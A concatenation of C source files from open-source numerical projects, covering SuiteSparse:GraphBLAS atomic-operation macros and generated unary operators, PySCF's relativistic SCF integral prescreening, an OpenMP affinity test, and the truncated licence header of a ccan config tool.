//
// #pragma omp atomic [clause]
//
// where [clause] is read, write, update, or capture.
//
// Microsoft Visual Studio only supports OpenMP 2.0, which does not have the
// [clause]. Without the [clause], #pragma omp atomic is like
// #pragma omp atomic update, but the expression can only be one of:
//
// x binop= expression
// x++
// ++x
// x--
// --x
//
// where binop is one of these operators: + * - / & ^ | << >>
//
// OpenMP 3.0 and later support additional options for the "update" clause,
// but SuiteSparse:GraphBLAS uses only this form:
//
// x binop= expression
//
// where binop is: + * & ^ |
//
// This atomic update is used for the PLUS, TIMES, LAND, LXOR, and LOR monoids,
// when applied to the built-in types. For PLUS and TIMES, these are the 10
// types INTx, UINTx, FP32, FP64 (for x = 8, 16, 32, and 64). For the boolean
// monoids, only the BOOL type is used.
//
// As a result, the atomic updates are the same for gcc and icc (which support
// OpenMP 3.0 or later) with the "update" clause. For MS Visual Studio, the
// "update" clause is removed.
#if GB_MICROSOFT
// MS Visual Studio does not support the "update" clause
#define GB_ATOMIC_UPDATE GB_PRAGMA (omp atomic)
#else
// assume OpenMP 3.0 or later
#define GB_ATOMIC_UPDATE GB_PRAGMA (omp atomic update)
#endif
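// Illustrative usage (editor's sketch, not from the original header; w and t
// are hypothetical variable names): with the macro in place, the same update
// compiles under gcc/icc (OpenMP 3.0) and under MS Visual Studio (OpenMP 2.0):
//
//      double t = aij * bij ;      // thread-local contribution
//      GB_ATOMIC_UPDATE            // expands to #pragma omp atomic [update]
//      w += t ;                    // the "x binop= expression" form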
//------------------------------------------------------------------------------
// atomic reads and writes
//------------------------------------------------------------------------------
#if GB_MICROSOFT
// In Microsoft Visual Studio, simple reads and writes to properly aligned
// 64-bit values are already atomic on 64-bit Windows for any architecture
// supported by Windows (any Intel or ARM architecture). See:
// https://docs.microsoft.com/en-us/windows/win32/sync/interlocked-variable-access
// SuiteSparse:GraphBLAS is not supported on 32-bit Windows. Thus, there
// is no need for atomic reads/writes when compiling GraphBLAS on Windows
// with MS Visual Studio.
#define GB_ATOMIC_READ
#define GB_ATOMIC_WRITE
#else
#if __x86_64__
// No need for atomic read/write on x86_64. gcc already treats atomic
// read/write as plain read/write, so these definitions only affect icc.
#define GB_ATOMIC_READ
#define GB_ATOMIC_WRITE
#else
// ARM, Power8/9, and others need the explicit atomic read/write
#define GB_ATOMIC_READ GB_PRAGMA (omp atomic read)
#define GB_ATOMIC_WRITE GB_PRAGMA (omp atomic write)
#endif
#endif
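// Illustrative usage (editor's sketch; w and t are hypothetical names):
//
//      GB_ATOMIC_READ
//      t = w ;                     // atomic read of a shared value
//      ...
//      GB_ATOMIC_WRITE
//      w = t ;                     // atomic write of a shared value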
//------------------------------------------------------------------------------
// atomic capture
//------------------------------------------------------------------------------
// An atomic capture loads the prior value of the target into a thread-local
// result, and then overwrites the target with the new value. The target is a
// value that is shared between threads. The value and result arguments are
// thread-local. SuiteSparse:GraphBLAS uses three atomic captures,
// defined below, of the form:
//
// { result = target ; target = value ; } for int64_t and int8_t
// { result = target ; target |= value ; } for int64_t
//
// OpenMP 4.0 and later supports atomic captures with a "capture" clause:
//
// #pragma omp atomic capture
// { result = target ; target = value ; }
//
// or with a binary operator
//
// #pragma omp atomic capture
// { result = target ; target binop= value ; }
//
// MS Visual Studio supports only OpenMP 2.0, and does not support any
// "capture" clause. Thus, on Windows, _InterlockedExchange* and
// _InterlockedOr* functions are used instead, as described here:
//
// https://docs.microsoft.com/en-us/cpp/intrinsics/interlockedexchange-intrinsic-functions
// https://docs.microsoft.com/en-us/cpp/intrinsics/interlockedor-intrinsic-functions
//--------------------------------------------------------------------------
// atomic capture for int64_t
//--------------------------------------------------------------------------
// int64_t result, target, value ;
// do this atomically: { result = target ; target = value ; }
#if GB_MICROSOFT
#define GB_ATOMIC_CAPTURE_INT64(result, target, value) \
{ \
result = _InterlockedExchange64 \
((int64_t volatile *) (&(target)), value) ; \
}
#else
#define GB_ATOMIC_CAPTURE_INT64(result, target, value) \
{ \
GB_PRAGMA (omp atomic capture) \
{ \
result = target ; \
target = value ; \
} \
}
#endif
//--------------------------------------------------------------------------
// atomic capture for int8_t
//--------------------------------------------------------------------------
// int8_t result, target, value ;
// do this atomically: { result = target ; target = value ; }
#if GB_MICROSOFT
#define GB_ATOMIC_CAPTURE_INT8(result, target, value) \
{ \
result = _InterlockedExchange8 \
((char volatile *) &(target), value) ; \
}
#else
#define GB_ATOMIC_CAPTURE_INT8(result, target, value) \
{ \
GB_PRAGMA (omp atomic capture) \
{ \
result = target ; \
target = value ; \
} \
}
#endif
//--------------------------------------------------------------------------
// atomic capture with bitwise OR, for int64_t
//--------------------------------------------------------------------------
// int64_t result, target, value ;
// do this atomically: { result = target ; target |= value ; }
#if GB_MICROSOFT
#define GB_ATOMIC_CAPTURE_INT64_OR(result, target, value) \
{ \
result = _InterlockedOr64 \
((int64_t volatile *) (&(target)), value) ; \
}
#else
#define GB_ATOMIC_CAPTURE_INT64_OR(result, target, value) \
{ \
GB_PRAGMA (omp atomic capture) \
{ \
result = target ; \
target |= value ; \
} \
}
#endif
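// Illustrative usage (editor's sketch; "slot" is a hypothetical shared
// variable): claim a slot by atomically swapping in a -1 sentinel, so that
// exactly one thread observes any given prior value:
//
//      int64_t old ;
//      GB_ATOMIC_CAPTURE_INT64 (old, slot, -1) ;   // { old = slot ; slot = -1 ; }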
//------------------------------------------------------------------------------
// atomic compare-and-exchange
//------------------------------------------------------------------------------
// Atomic compare-and-exchange is used to implement the MAX, MIN and EQ
// monoids, for the fine-grain saxpy-style matrix multiplication. Ideally,
// OpenMP would be used for these atomic operations, but OpenMP does not
// support them, so compiler-specific functions are used instead.
// In gcc and icc, the atomic compare-and-exchange function
// __atomic_compare_exchange computes the following, as a single atomic
// operation, where type_t is any 8, 16, 32, or 64 bit scalar type. In
// SuiteSparse:GraphBLAS, type_t can be bool, int8_t, uint8_t, int16_t,
// uint16_t, int32_t, uint32_t, int64_t, uint64_t, float, or double.
//
// bool __atomic_compare_exchange
// (
// type_t *target, // input/output
// type_t *expected, // input/output
// type_t *desired, // input only, even though it is a pointer
// bool weak, // true, for SuiteSparse:GraphBLAS
// int success_memorder, // __ATOMIC_RELAXED for SuiteSparse:GrB
// int failure_memorder // __ATOMIC_RELAXED for SuiteSparse:GrB
// )
// {
// bool result ;
// if (*target == *expected)
// {
// *target = *desired ;
// result = true ;
// }
// else
// {
// *expected = *target ;
// result = false ;
// }
// return (result) ;
// }
//
// The generic __atomic_compare_exchange function in gcc (also supported by
// icc) computes the above for any of these 8, 16, 32, or 64-bit scalar types
// needed in SuiteSparse:GraphBLAS. SuiteSparse:GraphBLAS does not require the
// 'expected = target' assignment if the result is false. It ignores the
// value of 'expected' after the operation completes. The target, expected,
// and desired parameters are all provided as pointers.
//
// __atomic_compare_exchange also includes parameters that define the memory
// model. SuiteSparse:GraphBLAS can use the most relaxed settings for these
// parameters (weak is true, and the memorder parameters are both
// __ATOMIC_RELAXED).
//
// See https://gcc.gnu.org/onlinedocs/gcc/_005f_005fatomic-Builtins.html for
// more details.
// Microsoft Visual Studio provides similar but not identical functionality in
// the _InterlockedCompareExchange functions, but they are named differently
// for different types. Only int8_t, int16_t, int32_t, and int64_t types are
// supported. For the int64_t case, the following is performed atomically:
//
//      int64_t _InterlockedCompareExchange64
//      (
//          int64_t volatile *target,    // input/output
//          int64_t desired,             // input only
//          int64_t expected             // input only
//      )
//      {
//          int64_t result = *target ;
//          if (*target == expected)
//          {
//              *target = desired ;
//          }
//          return (result) ;
//      }
//
// It does not assign "expected = target" if the test is false, but
// SuiteSparse:GraphBLAS does not require this action. It does not return a
// boolean result, but instead returns the original value of (*target).
// However, this can be compared with the expected value to obtain the
// same boolean result as __atomic_compare_exchange.
//
// Type punning is used to extend these signed integer types to unsigned
// integers of the same number of bytes, and to float and double.
#if GB_MICROSOFT
//--------------------------------------------------------------------------
// GB_PUN: type punning
//--------------------------------------------------------------------------
// With type punning, a value is treated as a different type, but with no
// typecasting. The address of the variable is first typecasted to a (type
// *) pointer, and then the pointer is dereferenced. Type punning is only
// needed to extend the atomic compare/exchange functions for Microsoft
// Visual Studio.
#define GB_PUN(type,value) (*((type *) (&(value))))
//--------------------------------------------------------------------------
// compare/exchange for MS Visual Studio
//--------------------------------------------------------------------------
// bool, int8_t, and uint8_t
#define GB_ATOMIC_COMPARE_EXCHANGE_8(target, expected, desired) \
( \
GB_PUN (int8_t, expected) == \
_InterlockedCompareExchange8 ((int8_t volatile *) (target), \
GB_PUN (int8_t, desired), GB_PUN (int8_t, expected)) \
)
// int16_t and uint16_t
#define GB_ATOMIC_COMPARE_EXCHANGE_16(target, expected, desired) \
( \
GB_PUN (int16_t, expected) == \
_InterlockedCompareExchange16 ((int16_t volatile *) (target), \
GB_PUN (int16_t, desired), GB_PUN (int16_t, expected)) \
)
// float, int32_t, and uint32_t
#define GB_ATOMIC_COMPARE_EXCHANGE_32(target, expected, desired) \
( \
GB_PUN (int32_t, expected) == \
_InterlockedCompareExchange ((int32_t volatile *) (target), \
GB_PUN (int32_t, desired), GB_PUN (int32_t, expected)) \
)
// double, int64_t, and uint64_t
#define GB_ATOMIC_COMPARE_EXCHANGE_64(target, expected, desired) \
( \
GB_PUN (int64_t, expected) == \
_InterlockedCompareExchange64 ((int64_t volatile *) (target), \
GB_PUN (int64_t, desired), GB_PUN (int64_t, expected)) \
)
#else
//--------------------------------------------------------------------------
// compare/exchange for gcc, icc, and clang
//--------------------------------------------------------------------------
// the compare/exchange function is generic for any type
#define GB_ATOMIC_COMPARE_EXCHANGE_X(target, expected, desired) \
__atomic_compare_exchange (target, &expected, &desired, \
true, __ATOMIC_RELAXED, __ATOMIC_RELAXED)
// bool, int8_t, and uint8_t
#define GB_ATOMIC_COMPARE_EXCHANGE_8(target, expected, desired) \
GB_ATOMIC_COMPARE_EXCHANGE_X(target, expected, desired)
// int16_t and uint16_t
#define GB_ATOMIC_COMPARE_EXCHANGE_16(target, expected, desired) \
GB_ATOMIC_COMPARE_EXCHANGE_X (target, expected, desired)
// float, int32_t, and uint32_t
#define GB_ATOMIC_COMPARE_EXCHANGE_32(target, expected, desired) \
GB_ATOMIC_COMPARE_EXCHANGE_X (target, expected, desired)
// double, int64_t, and uint64_t
#define GB_ATOMIC_COMPARE_EXCHANGE_64(target, expected, desired) \
GB_ATOMIC_COMPARE_EXCHANGE_X (target, expected, desired)
#endif
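//------------------------------------------------------------------------------
// illustrative compare-and-exchange loop (editor's sketch)
//------------------------------------------------------------------------------
// A hedged sketch of how such a macro is typically used for an atomic MIN
// update (the variable names are hypothetical, not taken from GraphBLAS):
//
//      double expected = target ;                  // atomic read in real code
//      while (t < expected)
//      {
//          if (GB_ATOMIC_COMPARE_EXCHANGE_64 (&target, expected, t)) break ;
//          expected = target ;                     // lost the race; retry
//      }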
#endif
|
rkb_screen.c | /* Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*
* Author: Qiming Sun <osirpt.sun@gmail.com>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>
#include <complex.h>
#include <assert.h>
#include "cint.h"
#include "cvhf.h"
#include "optimizer.h"
#define MAX(I,J) ((I) > (J) ? (I) : (J))
#define LL 0
#define SS 1
#define SL 2
#define LS 3
int int2e_spinor();
int int2e_spsp1spsp2_spinor();
int GTOmax_cache_size(int (*intor)(), int *shls_slice, int ncenter,
int *atm, int natm, int *bas, int nbas, double *env);
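/* Editor's note (hedged summary, not in the original source): the prescreen
 * functions below apply the standard direct-SCF Cauchy-Schwarz bound
 * |(ij|kl)| <= q_ij * q_kl, with q_ij ~ sqrt(max|(ij|ij)|) cached in
 * opt->q_cond and density-matrix bounds cached in opt->dm_cond; a shell
 * quartet is computed only if its bounded contribution can exceed
 * opt->direct_scf_cutoff. */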
int CVHFrkbllll_prescreen(int *shls, CVHFOpt *opt,
int *atm, int *bas, double *env)
{
if (!opt) {
return 1; // no screen
}
int i = shls[0];
int j = shls[1];
int k = shls[2];
int l = shls[3];
int n = opt->nbas;
assert(opt->q_cond);
assert(opt->dm_cond);
assert(i < n);
assert(j < n);
assert(k < n);
assert(l < n);
double qijkl = opt->q_cond[i*n+j] * opt->q_cond[k*n+l];
double dmin = opt->direct_scf_cutoff / qijkl;
return qijkl > opt->direct_scf_cutoff
&&((opt->dm_cond[j*n+i] > dmin)
|| (opt->dm_cond[l*n+k] > dmin)
|| (opt->dm_cond[j*n+k] > dmin)
|| (opt->dm_cond[j*n+l] > dmin)
|| (opt->dm_cond[i*n+k] > dmin)
|| (opt->dm_cond[i*n+l] > dmin));
}
int CVHFrkbllll_vkscreen(int *shls, CVHFOpt *opt,
double **dms_cond, int n_dm, double *dm_atleast,
int *atm, int *bas, double *env)
{
int i = shls[0];
int j = shls[1];
int k = shls[2];
int l = shls[3];
int nbas = opt->nbas;
int idm;
double qijkl = opt->q_cond[i*nbas+j] * opt->q_cond[k*nbas+l];
double *pdmscond = opt->dm_cond + nbas*nbas;
for (idm = 0; idm < (n_dm+1)/2; idm++) {
// note in _vhf.rdirect_mapdm, J and K share the same DM
dms_cond[idm*2+0] = pdmscond + idm*nbas*nbas; // for vj
dms_cond[idm*2+1] = pdmscond + idm*nbas*nbas; // for vk
}
*dm_atleast = opt->direct_scf_cutoff / qijkl;
return 1;
}
int CVHFrkbssll_prescreen(int *shls, CVHFOpt *opt,
int *atm, int *bas, double *env)
{
if (!opt) {
return 1; // no screen
}
int i = shls[0];
int j = shls[1];
int k = shls[2];
int l = shls[3];
int n = opt->nbas;
assert(opt->q_cond);
assert(opt->dm_cond);
assert(i < n);
assert(j < n);
assert(k < n);
assert(l < n);
double *dmsl = opt->dm_cond + n*n*SL;
double qijkl = opt->q_cond[n*n*SS+i*n+j] * opt->q_cond[k*n+l];
double dmin = opt->direct_scf_cutoff / qijkl;
return qijkl > opt->direct_scf_cutoff
&&((opt->dm_cond[n*n*SS+j*n+i] > dmin)
|| (opt->dm_cond[l*n+k] > dmin)
|| (dmsl[j*n+k] > dmin)
|| (dmsl[j*n+l] > dmin)
|| (dmsl[i*n+k] > dmin)
|| (dmsl[i*n+l] > dmin));
}
// be careful with the order in dms_cond: the current order (dmll, dmss, dmsl)
// is consistent with the function _call_veff_ssll in dhf.py
int CVHFrkbssll_vkscreen(int *shls, CVHFOpt *opt,
double **dms_cond, int n_dm, double *dm_atleast,
int *atm, int *bas, double *env)
{
int i = shls[0];
int j = shls[1];
int k = shls[2];
int l = shls[3];
int nbas = opt->nbas;
int idm;
double qijkl = opt->q_cond[nbas*nbas*SS+i*nbas+j] * opt->q_cond[k*nbas+l];
double *pdmscond = opt->dm_cond + 4*nbas*nbas;
int nset = (n_dm+2) / 3;
double *dmscondll = pdmscond + nset*nbas*nbas*LL;
double *dmscondss = pdmscond + nset*nbas*nbas*SS;
double *dmscondsl = pdmscond + nset*nbas*nbas*SL;
for (idm = 0; idm < nset; idm++) {
dms_cond[nset*0+idm] = dmscondll + idm*nbas*nbas;
dms_cond[nset*1+idm] = dmscondss + idm*nbas*nbas;
dms_cond[nset*2+idm] = dmscondsl + idm*nbas*nbas;
}
*dm_atleast = opt->direct_scf_cutoff / qijkl;
return 1;
}
static void set_qcond(int (*intor)(), CINTOpt *cintopt, double *qcond,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
int shls_slice[] = {0, nbas};
const int cache_size = GTOmax_cache_size(intor, shls_slice, 1,
atm, natm, bas, nbas, env);
#pragma omp parallel
{
double qtmp, tmp;
int i, j, ij, di, dj, ish, jsh;
int shls[4];
double *cache = malloc(sizeof(double) * cache_size);
di = 0;
for (ish = 0; ish < nbas; ish++) {
dj = ao_loc[ish+1] - ao_loc[ish];
di = MAX(di, dj);
}
double complex *buf = malloc(sizeof(double complex) * di*di*di*di);
#pragma omp for schedule(dynamic, 4)
for (ij = 0; ij < nbas*(nbas+1)/2; ij++) {
// invert the triangular index ij = ish*(ish+1)/2 + jsh (with jsh <= ish);
// the +1e-7 guards against floating-point round-off in sqrt
ish = (int)(sqrt(2*ij+.25) - .5 + 1e-7);
jsh = ij - ish*(ish+1)/2;
di = ao_loc[ish+1] - ao_loc[ish];
dj = ao_loc[jsh+1] - ao_loc[jsh];
shls[0] = ish;
shls[1] = jsh;
shls[2] = ish;
shls[3] = jsh;
qtmp = 1e-100;
if (0 != (*intor)(buf, NULL, shls, atm, natm, bas, nbas, env, cintopt, cache)) {
for (i = 0; i < di; i++) {
for (j = 0; j < dj; j++) {
// |(ij|ij)|: the diagonal element of the (ij,ij) shell-pair ERI block
tmp = cabs(buf[i+di*j+di*dj*i+di*dj*di*j]);
qtmp = MAX(qtmp, tmp);
} }
qtmp = sqrt(qtmp);
}
qcond[ish*nbas+jsh] = qtmp;
qcond[jsh*nbas+ish] = qtmp;
}
free(buf);
free(cache);
}
}
void CVHFrkbllll_direct_scf(CVHFOpt *opt, int (*intor)(), CINTOpt *cintopt,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
if (opt->q_cond) {
free(opt->q_cond);
}
opt->q_cond = (double *)malloc(sizeof(double) * nbas*nbas);
assert(intor == &int2e_spinor);
set_qcond(intor, cintopt, opt->q_cond, ao_loc, atm, natm, bas, nbas, env);
}
void CVHFrkbssss_direct_scf(CVHFOpt *opt, int (*intor)(), CINTOpt *cintopt,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
if (opt->q_cond) {
free(opt->q_cond);
}
opt->q_cond = (double *)malloc(sizeof(double) * nbas*nbas);
assert(intor == &int2e_spsp1spsp2_spinor);
set_qcond(intor, cintopt, opt->q_cond, ao_loc, atm, natm, bas, nbas, env);
double c1 = .25/(env[PTR_LIGHT_SPEED]*env[PTR_LIGHT_SPEED]);
double *qcond = opt->q_cond;
int i;
for (i = 0; i < nbas*nbas; i++) {
qcond[i] *= c1;
}
}
void CVHFrkbssll_direct_scf(CVHFOpt *opt, int (*intor)(), CINTOpt *cintopt,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
if (opt->q_cond) {
free(opt->q_cond);
}
opt->q_cond = (double *)malloc(sizeof(double) * nbas*nbas*2);
set_qcond(&int2e_spinor, NULL, opt->q_cond, ao_loc, atm, natm, bas, nbas, env);
set_qcond(&int2e_spsp1spsp2_spinor, NULL, opt->q_cond+nbas*nbas, ao_loc,
atm, natm, bas, nbas, env);
double c1 = .25/(env[PTR_LIGHT_SPEED]*env[PTR_LIGHT_SPEED]);
double *qcond = opt->q_cond + nbas*nbas;
int i;
for (i = 0; i < nbas*nbas; i++) {
qcond[i] *= c1;
}
}
static void set_dmcond(double *dmcond, double *dmscond, double complex *dm,
double direct_scf_cutoff, int nset, int *ao_loc,
int *atm, int natm, int *bas, int nbas, double *env)
{
const size_t nao = ao_loc[nbas];
double dmax, dmaxi, tmp;
int i, j, ish, jsh;
int iset;
double complex *pdm;
for (ish = 0; ish < nbas; ish++) {
for (jsh = 0; jsh <= ish; jsh++) {
dmax = 0;
for (iset = 0; iset < nset; iset++) {
dmaxi = 0;
pdm = dm + nao*nao*iset;
for (i = ao_loc[ish]; i < ao_loc[ish+1]; i++) {
for (j = ao_loc[jsh]; j < ao_loc[jsh+1]; j++) {
tmp = .5 * (cabs(pdm[i*nao+j]) + cabs(pdm[j*nao+i]));
dmaxi = MAX(dmaxi, tmp);
} }
dmscond[iset*nbas*nbas+ish*nbas+jsh] = dmaxi;
dmscond[iset*nbas*nbas+jsh*nbas+ish] = dmaxi;
dmax = MAX(dmax, dmaxi);
}
dmcond[ish*nbas+jsh] = dmax;
dmcond[jsh*nbas+ish] = dmax;
} }
}
// dm_cond holds 1+nset blocks: the overall dmcond followed by nset per-DM dmscond blocks
void CVHFrkbllll_direct_scf_dm(CVHFOpt *opt, double complex *dm, int nset,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
if (opt->dm_cond) { // do NOT reuse opt->dm_cond: nset may differ between calls
free(opt->dm_cond);
}
opt->dm_cond = (double *)malloc(sizeof(double)*nbas*nbas*(1+nset));
memset(opt->dm_cond, 0, sizeof(double)*nbas*nbas*(1+nset));
// dmcond followed by dmscond which are max matrix element for each dm
set_dmcond(opt->dm_cond, opt->dm_cond+nbas*nbas, dm,
opt->direct_scf_cutoff, nset, ao_loc, atm, natm, bas, nbas, env);
}
void CVHFrkbssss_direct_scf_dm(CVHFOpt *opt, double complex *dm, int nset,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
if (opt->dm_cond) {
free(opt->dm_cond);
}
opt->dm_cond = (double *)malloc(sizeof(double)*nbas*nbas*(1+nset));
memset(opt->dm_cond, 0, sizeof(double)*nbas*nbas*(1+nset));
set_dmcond(opt->dm_cond, opt->dm_cond+nbas*nbas, dm,
opt->direct_scf_cutoff, nset, ao_loc, atm, natm, bas, nbas, env);
}
// the current order of dmscond (dmll, dmss, dmsl) is consistent with the
// function _call_veff_ssll in dhf.py
void CVHFrkbssll_direct_scf_dm(CVHFOpt *opt, double complex *dm, int nset,
int *ao_loc, int *atm, int natm,
int *bas, int nbas, double *env)
{
if (opt->dm_cond) {
free(opt->dm_cond);
}
if (nset < 3) {
fprintf(stderr, "At least 3 sets of DMs (dmll,dmss,dmsl) are "
"required to set rkb prescreening\n");
exit(1);
}
nset = nset / 3;
opt->dm_cond = (double *)malloc(sizeof(double)*nbas*nbas*4*(1+nset));
memset(opt->dm_cond, 0, sizeof(double)*nbas*nbas*4*(1+nset));
// 4 types of dmcond (LL,SS,SL,LS) followed by 4 types of dmscond
int n2c = CINTtot_cgto_spinor(bas, nbas);
double *dmcondll = opt->dm_cond + nbas*nbas*LL;
double *dmcondss = opt->dm_cond + nbas*nbas*SS;
double *dmcondsl = opt->dm_cond + nbas*nbas*SL;
//double *dmcondls = opt->dm_cond + nbas*nbas*LS;
double *pdmscond = opt->dm_cond + nbas*nbas*4;
double *dmscondll = pdmscond + nset*nbas*nbas*LL;
double *dmscondss = pdmscond + nset*nbas*nbas*SS;
double *dmscondsl = pdmscond + nset*nbas*nbas*SL;
//double *dmscondls = dmscond + nset*nbas*nbas*LS;
double complex *dmll = dm + n2c*n2c*LL*nset;
double complex *dmss = dm + n2c*n2c*SS*nset;
double complex *dmsl = dm + n2c*n2c*SL*nset;
//double complex *dmls = dm + n2c*n2c*LS*nset;
set_dmcond(dmcondll, dmscondll, dmll,
opt->direct_scf_cutoff, nset, ao_loc, atm, natm, bas, nbas, env);
set_dmcond(dmcondss, dmscondss, dmss,
opt->direct_scf_cutoff, nset, ao_loc, atm, natm, bas, nbas, env);
set_dmcond(dmcondsl, dmscondsl, dmsl,
opt->direct_scf_cutoff, nset, ao_loc, atm, natm, bas, nbas, env);
}
|
simple_env.c | // RUN: %libomp-compile
// RUN: env OMP_DISPLAY_AFFINITY=true OMP_AFFINITY_FORMAT='TESTER-ENV: tl:%L tn:%n nt:%N' OMP_NUM_THREADS=8 %libomp-run | %python %S/check.py -c 'CHECK-8' %s
#include <stdio.h>
#include <stdlib.h>
#include <omp.h>
int main(int argc, char** argv) {
#pragma omp parallel
{ }
#pragma omp parallel
{ }
return 0;
}
// CHECK-8: num_threads=8 TESTER-ENV: tl:1 tn:[0-7] nt:8$
|
GB_unaryop__abs_fp64_uint32.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2020, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__abs_fp64_uint32
// op(A') function: GB_tran__abs_fp64_uint32
// C type: double
// A type: uint32_t
// cast: double cij = (double) aij
// unaryop: cij = fabs (aij)
#define GB_ATYPE \
uint32_t
#define GB_CTYPE \
double
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
uint32_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = fabs (x) ;
// casting
#define GB_CASTING(z, aij) \
double z = (double) aij ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (z, aij) ; \
GB_OP (GB_CX (pC), z) ; \
}
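// For this operator, GB_CAST_OP (p, p) therefore expands (schematically) to:
//      uint32_t aij = Ax [p] ;
//      double z = (double) aij ;
//      Cx [p] = fabs (z) ;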
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_ABS || GxB_NO_FP64 || GxB_NO_UINT32)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__abs_fp64_uint32
(
double *Cx, // Cx and Ax may be aliased
uint32_t *Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__abs_fp64_uint32
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *GB_RESTRICT *Rowcounts,
GBI_single_iterator Iter,
const int64_t *GB_RESTRICT A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
GB_unop__ainv_uint64_uint64.c | //------------------------------------------------------------------------------
// GB_unop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2020, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_unop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop_apply__ainv_uint64_uint64
// op(A') function: GB_unop_tran__ainv_uint64_uint64
// C type: uint64_t
// A type: uint64_t
// cast: uint64_t cij = aij
// unaryop: cij = -aij
#define GB_ATYPE \
uint64_t
#define GB_CTYPE \
uint64_t
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
uint64_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = -x ;
// casting
#define GB_CAST(z, aij) \
uint64_t z = aij ;
// cij = op (aij)
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
uint64_t aij = Ax [pA] ; \
/* Cx [pC] = op (cast (aij)) */ \
uint64_t z = aij ; \
Cx [pC] = -z ; \
}
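// Note (editor's): for uint64_t, Cx [pC] = -z is well defined in C as the
// additive inverse modulo 2^64, which is what AINV (additive inverse)
// computes for unsigned types.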
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_AINV || GxB_NO_UINT64)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop_apply__ainv_uint64_uint64
(
uint64_t *Cx, // Cx and Ax may be aliased
const uint64_t *Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
uint64_t aij = Ax [p] ;
uint64_t z = aij ;
Cx [p] = -z ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop_tran__ainv_uint64_uint64
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *GB_RESTRICT *Rowcounts,
GBI_single_iterator Iter,
const int64_t *GB_RESTRICT A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
configurator.c | /* Simple tool to create config.h.
* Would be much easier with ccan modules, but deliberately standalone.
*
* Copyright 2011 Rusty Russell <rusty@rustcorp.com.au>. MIT license.
*
* c12r_err, c12r_errx functions copied from ccan/err/err.c
* Copyright Rusty Russell <rusty@rustcorp.com.au>. CC0 (Public domain) License.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
